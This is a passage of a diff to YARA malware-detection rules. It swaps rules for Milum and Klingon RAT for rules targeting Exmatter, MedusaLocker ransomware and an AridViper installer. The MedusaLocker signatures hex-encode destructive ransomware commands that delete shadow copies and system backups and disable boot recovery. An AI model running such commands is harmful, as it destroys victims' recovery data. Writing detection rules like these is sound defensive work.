8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 85 f6 75 2d ff 15 [4] 83 f8 06 75 22 e8 b6 ff ff ff e8 73 ff ff ff 56 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 8b c6 5e } - $seq5 = { 55 8b ec 81 ec b4 09 00 00 a1 08 [3] 33 c5 89 45 fc 53 56 57 6a ?? 68 [4] ba 18 00 00 00 33 c9 e8 [2] ff ff 83 c4 08 6a 00 6a 00 ff d0 8b f0 85 f6 0f 88 9a 03 00 00 c7 85 8c f7 ff ff [3] 00 bb 03 00 00 00 8b 85 8c f7 ff ff 99 f7 fb 8b 85 8c f7 ff ff 8d 7b 02 85 d2 74 57 83 c0 02 03 c6 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 0f 85 64 01 00 00 66 66 0f 1f 84 00 00 00 00 00 8b 85 8c f7 ff ff 40 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 74 dd e9 32 01 00 00 25 01 00 00 80 79 07 48 83 c8 fe 83 c0 01 74 47 b8 02 00 00 00 2b } - $seq6 = { 83 3b 00 c7 45 94 00 00 00 00 0f 86 57 02 00 00 8b 35 b4 21 41 00 8d 4b 14 8b 3d c8 21 41 00 8b 1d 9c 21 41 00 89 4d 90 c7 45 98 7f 00 00 00 89 b5 7c ff ff ff 89 bd 78 ff ff ff 89 5d 9c 0f 1f 40 00 8b 11 8d 45 d0 89 55 cc b9 2c 00 00 00 0f 1f 00 c6 00 00 8d 40 01 83 e9 01 75 f5 52 ff d6 8b f0 ff d7 c6 45 b4 00 bf 7f 00 00 00 c6 45 b5 42 c6 45 b6 31 c6 45 b7 2a c6 45 b8 0b c6 45 b9 63 8a 4d b5 80 7d b4 00 75 28 33 c9 66 0f 1f 44 00 00 8a 44 0d b5 0f b6 c0 83 e8 63 6b c0 25 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d b5 41 83 f9 05 72 e0 8d 45 b5 50 56 ff d3 c6 45 a0 00 c6 45 a1 51 c6 45 a2 1f c6 45 a3 2b c6 45 a4 44 c6 45 a5 51 c6 45 a6 12 c6 45 a7 45 c6 45 a8 44 c6 45 a9 26 89 45 84 8a 45 a1 80 7d a0 00 75 27 33 c9 0f 1f 00 8a 44 0d a1 0f b6 c0 83 e8 26 8d 04 80 03 c0 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d a1 41 83 f9 09 72 de 8d 45 a1 50 56 ff d3 c6 45 bc 00 8b d8 c6 45 bd 42 c6 45 be 19 c6 45 bf 46 c6 45 c0 59 8a 4d bd 80 7d bc 00 89 5d 88 75 2c 33 ff 8d 5f 7f 8a 44 3d bd 0f b6 c8 83 e9 59 8b c1 c1 e0 05 2b c1 99 f7 fb 8d 42 7f 99 f7 fb 88 54 3d bd 47 83 ff 04 72 dc 8b 5d 88 8d 45 bd 50 56 ff 55 9c c6 45 ac 00 8b f8 c6 45 ad 76 c6 45 ae 30 c6 45 af 06 c6 45 b0 21 c6 45 b1 2a 8a 4d ad 80 7d ac 00 75 24 33 c9 8a 44 0d ad 0f b6 c0 83 e8 2a 8d 04 c0 99 f7 7d 98 8d 42 7f 99 f7 7d 98 88 54 0d ad 41 83 f9 05 72 de 8d 45 ad 50 56 ff 55 9c } + $s1 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8d 54 24 ?? 8b 5c 24 ?? 48 8d 74 24 ?? 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 48 89 5c 24 18 48 89 74 24 20 89 f8 48 89 44 24 28 48 c7 44 24 30 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 38 00 74 ?? 48 8b 54 24 ?? c6 82 e5 00 00 00 00 48 8b 54 24 ?? 31 c0 } + $s2 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 89 0c 24 48 89 44 24 08 44 0f 11 7c 24 10 48 c7 44 24 20 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 28 00 74 0a 48 8b 6c 24 ?? 48 83 c4 ?? c3 e8 [3] 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 } + $s3 = { 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 5c 24 58 48 83 3d [3] 00 00 75 73 48 8b 05 45 [2] 00 48 8d 0d 66 [2] 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 04 01 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 8b 44 24 18 48 85 c0 0f 84 6a 01 00 00 48 3d 04 01 00 00 0f 87 5e 01 00 00 48 8d 1d 1a [2] 00 c6 04 03 5c 4c 8d 40 01 4c 89 05 [3] 00 48 8b 44 24 50 48 8b 5c } + $s4 = { 48 89 44 24 40 c7 44 24 3c 00 00 00 00 48 8b 0d [3] 00 48 8d 54 24 3c 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 18 00 75 10 48 8b 44 24 40 8b 4c 24 68 48 8b 5c 24 60 eb 1d 48 8b 44 24 40 48 8b 5c 24 60 8b 4c 24 68 e8 8f 00 00 00 48 8b 6c 24 48 48 83 c4 50 c3 c7 44 24 38 00 00 00 00 48 8b 15 [3] 00 48 8d 74 24 38 48 89 14 24 48 89 44 24 08 48 89 5c 24 10 48 63 c1 48 89 44 24 18 48 89 74 24 20 48 c7 44 24 28 00 00 00 00 e8 } + $s5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 42 43 67 4b 43 41 51 45 41 } condition: - uint16(0)==0x5a4d and filesize >50KB and 5 of ($seq*) + uint16(0)==0x5a4d and filesize >400KB and 4 of them } -rule ARKBIRD_SOLG_MAL_Milum_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_EXF_Exmatter_Nov_2021_1 : FILE { meta: - description = "Detect Milum malware" + description = "Detect packed Exmatter with Confuser" author = "Arkbird_SOLG" - id = "ba1cc56e-f6da-57db-a773-4823ae343e31" - date = "2021-07-08" - modified = "2021-07-08" - reference = "https://securelist.com/wildpressure-targets-macos/103072/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-08/WildPressure/MAL_Milum_Jul_2021_1.yara#L1-L33" + id = "ddae7776-3202-50e6-b8af-0e5d15373386" + date = "2021-11-01" + modified = "2021-11-01" + reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Exmatter/EXF_Exmatter_Nov_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "4321051fdc9ab5f4ee12c4b505e4271df89b489067875eaf3d2cb670815f7e37" - score = 75 + logic_hash = "67aaac3db488a9e28897047a7498b7a447ec63cdb6da82cb3d4217c7d615f176" + score = 50 quality = 75 tags = "FILE" - hash1 = "7eafb957c2e715e06489a979a185f75d7a9d502223c8aba36e7b6b8ead7d03b2" - hash2 = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9" - hash3 = "5e0226f37b861876ec38e4a1564a26e4af3022d869375bc0f09b8feea4cd9e1b" - tlp = "White" - adversary = "WildPressure" + hash1 = "b6bc126526e27c98a94aab16989864161db1b3a75f18bd5c72bacbdfccad7bd7" + hash2 = "8eded48c166f50be5ac33be4b010b09f911ffc155a3ab76821e4febd369d17ef" + hash3 = "325ecd90ce19dd8d184ffe7dfb01b0dd02a77e9eabcb587f3738bcfbd3f832a1" + level = "Experimental" + tlp = "white" + adversary = "RaaS" strings: - $s1 = { 52 00 4f 00 4f 00 54 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 00 65 00 6c 00 65 00 63 00 74 00 20 [3-7] 20 00 46 00 72 00 6f 00 6d 00 20 00 41 00 6e 00 74 00 69 00 56 00 69 00 72 00 75 00 73 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 20 00 57 00 48 00 45 00 52 00 45 00 20 00 64 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 20 00 3c 00 3e 00 27 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 44 00 65 00 66 00 65 00 6e 00 64 00 65 00 72 00 27 } - $s2 = "c1VybCA9IHt1fQ0Kc1JlcXVlc3QgPSB7cH0NCkhUVFBQb3N0IHNVcmwsIHNSZXF1ZXN0DQpGdW5jdGlvbiBIVFRQUG9zdChzVXJsLCBzUmVxdWVzdCkNCiAgc2V0IG9IVFRQID0gQ3JlYXRlT2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpDQogIG9IVFRQLm9wZW4gIlBPU1QiLCBzVXJsLGZhbHNlDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZXF1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogIFdzY3JpcHQuRWNobyBvSFRUUC5yZXNwb25zZVRleHQNCiAgSFRUUFBvc3QgPSBvSFRUUC5yZXNwb25zZVRleHQNCiBFbmQgRnVuY3Rpb24=" fullword ascii - $s3 = { 46 49 4c 45 20 48 41 4e 44 45 4c 20 4e 4f 54 20 46 4f 55 4e 44 00 00 00 4e 4f 20 44 61 74 61 00 } - $s4 = { 28 00 77 00 73 00 33 00 32 00 29 00 65 00 79 00 4a 00 73 00 62 00 32 00 35 00 6e 00 64 00 32 00 46 00 70 00 64 00 43 00 49 00 36 00 49 00 6a 00 } - $s5 = { 55 8b ec 6a ff 68 [3] 00 64 a1 00 00 00 00 50 83 ec 24 a1 [3] 00 33 c5 89 45 f0 ?? 57 50 8d 45 f4 64 a3 00 00 00 00 [8] b9 0f 00 00 00 89 4e } - $s6 = { 20 2f 63 20 [0-1] 46 4f 52 20 2f 6c 20 25 69 20 69 6e 20 28 31 2c 31 2c [1-4] 29 20 44 4f 20 49 46 20 4e 4f 54 20 45 58 49 53 54 20 22 00 22 29 } - $s7 = { 83 c4 0c 8d 95 44 fe ff ff 52 c7 85 44 fe ff ff 14 01 00 00 ff 15 [3] 00 83 bd 48 fe ff ff 06 7d 17 bf [3] 00 89 bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 eb 1a c7 85 ?? fe ff ff [3] 00 8b bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 } - $s8 = { 8b 45 08 50 68 bc 78 45 00 68 d0 78 45 00 8d 8d d0 fc ff ff 51 ff d6 83 c4 10 8b 3d a0 e0 44 00 8b 35 c4 e0 44 00 8d 64 } + $s1 = { 45 38 42 44 32 35 45 33 46 35 33 34 39 39 41 43 31 39 42 44 42 34 31 45 37 36 45 38 36 38 39 37 38 39 31 31 42 43 35 41 44 46 37 36 34 33 31 38 33 45 34 38 36 33 38 32 42 44 33 42 42 44 30 30 00 35 41 41 34 30 37 35 37 33 42 34 43 36 45 43 43 41 45 35 36 44 30 46 35 43 34 33 35 34 36 32 33 39 38 43 30 41 46 42 35 33 46 36 44 36 32 33 31 44 38 39 34 44 34 44 31 41 37 46 44 36 45 30 30 00 42 33 39 46 43 34 39 41 36 31 35 36 45 37 31 35 45 38 42 39 37 41 35 30 46 44 34 35 46 45 34 36 38 37 30 37 38 44 42 44 31 45 45 43 46 46 44 39 46 38 35 31 34 30 42 35 33 31 36 45 39 32 31 30 00 44 33 30 39 45 32 43 32 30 31 43 37 35 43 43 30 38 43 35 33 36 42 41 34 30 32 31 45 41 35 37 43 45 42 34 44 30 34 34 39 32 36 30 31 36 46 46 39 39 46 45 44 45 36 31 35 34 36 31 30 41 32 31 30 00 36 43 37 35 38 36 33 43 32 46 39 38 44 37 46 41 45 33 36 45 37 44 46 43 45 38 46 31 39 45 43 39 35 41 46 30 30 43 43 42 33 44 43 39 39 39 31 38 46 42 38 43 30 42 35 38 39 42 30 42 34 35 31 30 } + $s2 = { 33 44 33 32 31 41 45 42 34 33 39 35 36 30 34 38 46 35 43 37 35 41 38 42 38 36 36 35 32 34 33 34 44 31 33 31 30 31 31 32 45 37 44 36 42 37 38 46 42 37 35 44 39 33 35 36 31 44 31 31 30 39 38 31 00 34 39 44 38 32 36 38 33 30 42 35 44 39 32 30 34 34 38 46 37 34 42 42 42 45 44 42 33 36 31 46 31 37 43 39 44 44 34 36 31 45 30 44 43 33 44 45 44 31 31 34 45 36 45 31 33 45 30 31 37 33 39 38 31 00 31 45 42 30 38 30 36 38 33 30 39 37 41 32 37 46 42 37 34 33 46 36 32 44 30 38 33 38 44 34 42 41 36 34 33 35 46 44 43 33 38 38 32 41 36 41 36 37 45 46 42 43 32 32 34 45 37 31 42 44 42 43 38 31 00 46 39 45 39 31 44 44 39 44 32 36 32 38 43 43 32 39 32 42 41 43 32 36 35 39 41 35 35 34 34 42 38 42 46 42 30 41 44 31 46 38 31 30 30 43 37 35 45 38 32 44 44 33 42 32 43 45 44 30 35 43 37 39 31 00 45 44 44 31 45 32 34 31 37 36 33 46 34 33 33 35 30 38 37 42 39 38 41 44 30 37 35 38 44 36 39 33 31 39 32 42 37 37 45 44 37 32 41 39 36 43 38 42 33 35 41 45 31 39 34 41 45 38 45 39 31 41 39 31 00 38 43 46 31 34 42 43 33 42 46 39 44 36 31 30 30 43 41 38 41 } + $s3 = "SSH_MSG_NEWKEYS" ascii + $s4 = { 35 45 46 32 31 35 39 31 38 33 32 30 41 44 38 41 46 41 41 30 32 35 33 35 35 34 36 46 34 34 33 43 38 44 30 39 46 30 41 44 35 31 33 37 45 35 32 30 33 34 32 38 38 43 37 36 39 41 43 36 42 41 44 46 00 44 36 32 45 45 38 34 39 37 41 45 34 39 35 41 33 31 31 34 35 41 37 37 41 35 43 39 44 35 35 37 30 34 43 30 38 38 33 42 30 31 35 46 45 31 41 45 39 46 44 46 46 45 32 30 38 46 31 33 46 41 45 44 46 00 31 35 32 30 33 33 46 38 33 46 37 46 41 36 36 34 35 31 39 33 42 33 32 32 43 43 42 31 36 37 32 46 30 38 39 35 36 42 36 38 43 33 38 44 31 33 32 46 32 32 37 38 46 43 46 30 46 41 30 34 44 46 45 46 00 33 41 33 36 41 46 34 41 46 30 41 31 46 45 35 37 39 35 44 42 39 39 46 41 38 44 33 39 34 46 41 32 44 38 39 30 41 32 32 35 32 38 30 41 38 41 31 35 39 41 43 37 39 46 31 45 34 38 45 45 31 38 46 46 00 44 43 37 42 45 38 33 42 33 45 46 46 38 31 45 38 43 39 45 30 36 46 37 44 37 43 31 46 34 42 44 37 33 34 46 32 30 32 30 41 34 32 34 32 39 45 32 32 41 32 36 31 42 30 45 45 45 31 36 44 31 39 46 46 } + $s5 = { 39 38 41 43 30 38 30 44 38 38 37 45 31 34 43 43 39 32 32 44 34 35 37 43 33 42 31 30 35 35 37 31 45 33 36 41 37 35 43 43 39 31 31 42 33 35 46 36 30 43 32 46 35 30 36 44 44 44 45 43 35 43 41 46 00 31 33 46 33 37 31 33 43 30 38 42 33 30 43 45 34 37 36 35 37 33 45 43 31 38 32 39 30 31 32 35 30 45 39 36 42 34 37 37 35 33 31 39 46 34 36 41 38 41 30 30 41 34 46 31 45 42 38 41 43 35 32 42 46 00 43 39 38 39 33 42 41 33 46 43 31 46 41 39 41 37 43 38 37 33 42 32 37 38 37 41 41 41 44 38 38 39 45 33 38 46 30 43 33 39 36 39 45 37 41 32 37 42 30 44 33 37 45 30 41 } + $s6 = "SSH_MSG_KEX_DH_GEX_INIT" ascii condition: - uint16(0)==0x5a4d and filesize >40KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >600KB and 5 of them } -rule ARKBIRD_SOLG_MAL_Klingon_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Medusalocker_July_2021_1 : FILE { meta: - description = "Detect the Klingon RAT" + description = "Detect MedusaLocker ransomware" author = "Arkbird_SOLG" - id = "bf114c4d-3010-5b34-954e-82794e30edcb" - date = "2021-06-19" - modified = "2021-06-21" - reference = "https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-20/Klingon/MAL_Klingon_Jun_2021_1.yara#L1-L18" + id = "7eec35ac-f1ec-596b-8224-ef27e31e841c" + date = "2021-07-25" + modified = "2021-08-08" + reference = "https://twitter.com/r3dbU7z/status/1418433910057353217" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-25/MedusaLocker/RAN_MedusaLocker_July_2021_1.yara#L1-L28" license_url = "N/A" - logic_hash = "283452d24edea988dc353fada4cd1e050db244a48cc6ab30f70e1900ca9c7c2f" + logic_hash = "541665541c07b585a7dfa024f85516b7be94d7d8d76a85e58c8c3b71fd0550ff" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "44237e2de44a533751c0baace09cf83293572ae7c51cb4575e7267be289c6611" - hash2 = "c98bb0649262277ec9dd16cf27f8b06042ff552535995f2bdd3355d2adeff801" - hash3 = "e8eea442e148c81f116de31b4fc3d0aa725c5dbbbd840b446a3fb9793d0b9f26" - tlp = "White" - adversary = "-" + hash1 = "033b4950a8f249b20eb86ec6f8f2ea0a1567bb164289d1aa7fb0ba51f9bbe46c" + hash2 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad" + hash3 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc" + hash4 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31" + tlp = "white" + adversary = "RaaS" strings: - $seq1 = { 81 3a 70 72 6f 78 0f 85 [2] 00 00 80 7a 04 79 0f 84 [2] 00 00 48 83 f9 05 75 12 81 3a 73 68 65 6c 75 0a 80 7a 04 6c 0f 84 [2] 00 00 48 83 f9 06 75 14 81 3a 62 69 6e 61 75 0c 66 81 7a 04 72 79 0f 84 [2] 00 00 48 83 f9 03 0f 85 ?? 04 00 00 66 81 3a 63 6d 0f 85 [2] 00 00 80 7a 02 64 0f 84 [2] 00 00 48 83 f9 06 } - $seq2 = { 48 8d 05 [3] 00 48 89 ?? 24 [1-4] 48 c7 84 24 ?? 00 00 00 ?? 00 00 00 48 8d 0d [3] 00 48 89 ?? 24 [0-4] 48 c7 ?? 24 } - $seq3 = { 48 8d 0d [3] 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 89 84 24 ?? 00 00 00 48 8d 05 [3] 00 48 89 04 24 48 c7 44 24 08 08 00 00 00 48 8d 84 24 ?? 00 00 00 48 89 44 24 10 48 c7 44 24 18 03 00 00 00 48 c7 44 24 20 03 00 00 00 e8 [3] ff 48 8b 44 24 30 48 89 44 24 58 48 8b 4c 24 28 48 89 8c 24 ?? 00 00 00 } + $s1 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 52 00 65 00 73 00 69 00 7a 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 53 00 74 00 6f 00 72 00 61 00 67 00 65 00 20 00 2f 00 66 00 6f 00 72 00 3d 00 ?? 00 3a 00 20 00 2f 00 6f 00 6e 00 3d 00 ?? 00 3a 00 20 00 2f 00 6d 00 61 00 78 00 73 00 69 00 7a 00 65 00 3d } + $s2 = { 64 00 65 00 6c 00 20 00 2f 00 73 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 56 00 48 00 44 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 63 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 6b 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 62 00 63 00 61 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 6b 00 66 00 20 00 ?? 00 3a 00 5c 00 42 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 62 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 73 00 65 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 69 00 6e 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 64 00 73 00 6b } + $s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 } + $s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 } + $s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide + $s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f } + $s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 } + $s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 } + $s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 } + $s10 = { 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 20 4c 49 53 54 20 4f 46 20 45 4e 43 52 59 50 54 45 44 20 46 49 4c 45 53 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 0d 0a } + $x1 = { 48 89 5c 24 08 57 48 83 ec 30 48 8b da 48 8b f9 e8 0b fe ff ff 44 8b 43 08 48 8d 47 28 44 2b 03 45 33 c9 48 8b 13 48 8b 4f 20 48 89 44 24 28 c7 44 24 20 00 00 00 00 ff 15 [2] 07 00 85 c0 74 12 c6 47 08 01 48 8b c7 48 8b 5c 24 40 48 83 c4 30 5f c3 ff 15 [2] 07 00 48 8b 5c 24 40 89 47 34 48 8b c7 } condition: - uint16(0)==0x5a4d and filesize >300KB and all of ($seq*) + uint16(0)==0x5A4D and filesize >150KB and 9 of ($s*) and $x1 } -rule ARKBIRD_SOLG_APT_APT_C_61_Dec_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Aridviper_Installer_Feb_2020_1 : FILE { meta: - description = "Detect similiar structures used in the APT-C-61 maldocs" + description = "Detect Installer used by AridViper group in Febuary 2021" author = "Arkbird_SOLG" - id = "48054d32-6613-5a54-b19c-8e9b8f747c14" - date = "2021-12-13" - modified = "2021-12-14" + id = "3d891aeb-b4d6-50f2-ad08-cb6d9d56064d" + date = "2021-02-08" + modified = "2021-02-09" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-13/APT_APT_C_61_Dec_2021_1.yara#L1-L20" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-08/AridViper/APT_AridViper_Installer_Feb_2020_1.yar#L1-L26" license_url = "N/A" - logic_hash = "be742a0ebc53f09872d5231cf367bb1e3ae04c1a70ce94610b6597e426eeb389" - score = 75 + logic_hash = "1fca713b7ac7f3e960a4174325c32578724e87241e159fbf7754c7e2d19779a1" + score = 50 quality = 69 tags = "FILE" - hash1 = "2cc0f8a85df2b2b0dd4c6942125bf82e647e9ac7bb91467ac5c480cf5e1dd4ff" - hash2 = "193c921f7ab12c0066014ffad37a98ee57ecd5101dae2ddeb5e39200eb704431" - hash3 = "4ec021cc3dbb2b0de7313e41063026e3ef4777baf4dec2bdad7cd2d515bf0fe2" - tlp = "white" - adversary = "APT-C-61" + level = "Experimental" + hash1 = "16ed131c4a7545495dc3f07d199748a5d0560e7c8a44493c1906163bedc9c2e0" + hash2 = "84d9c7852b87253ccf0ca1aad57e510a4badfe253c063a72c7751930f0279c83" strings: - $s1 = { 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 3e 53 45 54 20 [1-4] 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e } - $s2 = { 3c 2f 77 3a 72 3e 3c 77 3a 66 6c 64 53 69 6d 70 6c 65 20 77 3a 69 6e 73 74 72 3d 22 20 20 51 55 4f 54 45 20 20 } - $s3 = { 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e } - $s4 = { 3c 77 3a 72 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 44 44 45 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e 3c 2f 77 3a 72 3e } + $seq_db = { 8b 7d ec 33 d2 89 55 ec 8b 0f 8b c1 89 4d e4 38 11 74 2e 66 90 83 f8 ff 73 24 8a 08 40 80 f9 c0 72 16 8a 08 80 e1 c0 80 f9 80 75 0c 8a 48 01 40 80 e1 c0 80 f9 80 74 f4 42 80 38 00 75 d7 89 55 ec f7 46 18 00 00 08 00 74 47 8b d7 8b cb e8 a2 f9 ff ff 89 45 e0 85 c0 74 34 83 7d f0 01 b9 [3] 00 50 ff 75 f8 b8 [3] 00 ff 75 e4 0f 44 c8 51 ff 75 f4 68 [3] 00 53 e8 34 2e 00 00 8b 55 e0 83 c4 1c 8b ce e8 ?? c3 fc ff 8b 55 ec ff 75 e4 8b 45 f8 b9 [3] 00 83 7d f0 01 52 50 50 50 50 50 b8 [3] 00 0f 44 c1 50 ff 75 f4 68 [3] 00 53 e8 f8 2d 00 00 83 c4 2c ba [3] 00 8b ce ff 75 f4 e8 e6 2e 00 00 83 c4 04 85 c0 74 16 ff 37 ff 75 f8 ff 75 f4 68 [3] 00 53 e8 cc 2d 00 00 83 c4 14 8b d7 8b cb e8 90 f9 ff ff 89 45 e0 85 c0 74 1e 50 8b 45 f8 50 50 68 [3] 00 53 e8 a8 2d 00 00 8b 55 e0 83 c4 14 8b ce e8 ?? c3 fc ff f7 46 18 00 00 08 00 74 2e 8b cf e8 db e5 00 00 8b f0 85 f6 74 1e 0f 1f 44 00 00 8b 16 3b d7 74 0c ff 32 8b cb e8 f1 f9 ff ff 83 c4 04 8b 76 0c 85 f6 75 e7 8b 75 e8 ff 75 f8 8b d7 8b cb e8 d8 f9 ff ff 83 c4 04 } + $seq_createdb = { 8a 43 42 84 c0 78 05 0f be c0 eb 07 8b cf e8 ?? 91 fb ff 8b 4d f8 8b d0 e8 ?? 90 fb ff 68 [3] 00 8b d6 8b cb e8 4d fc ff ff 8b f8 83 c4 04 85 ff 0f 85 41 01 00 00 68 [3] 00 8b d6 8b cb e8 32 fc ff ff 8b f8 83 c4 04 85 ff 0f 85 26 01 00 00 68 [3] 00 8b d6 8b cb e8 17 fc ff ff 8b f8 83 c4 04 85 ff 0f 85 0b 01 00 00 68 [3] 00 8b d6 8b cb e8 fc fb ff ff 8b f8 83 c4 04 85 ff 0f 85 f0 00 00 00 68 [3] 00 8b d6 8b cb e8 e1 fb ff ff 8b f8 83 c4 04 85 ff 0f 85 d5 00 00 00 68 [3] 00 8b d6 8b cb e8 c6 fb ff ff 8b f8 83 c4 04 85 ff 0f 85 ba 00 00 00 68 [3] 00 8b d6 8b cb e8 eb fa ff ff 8b f8 83 c4 04 85 ff 0f 85 9f 00 00 00 33 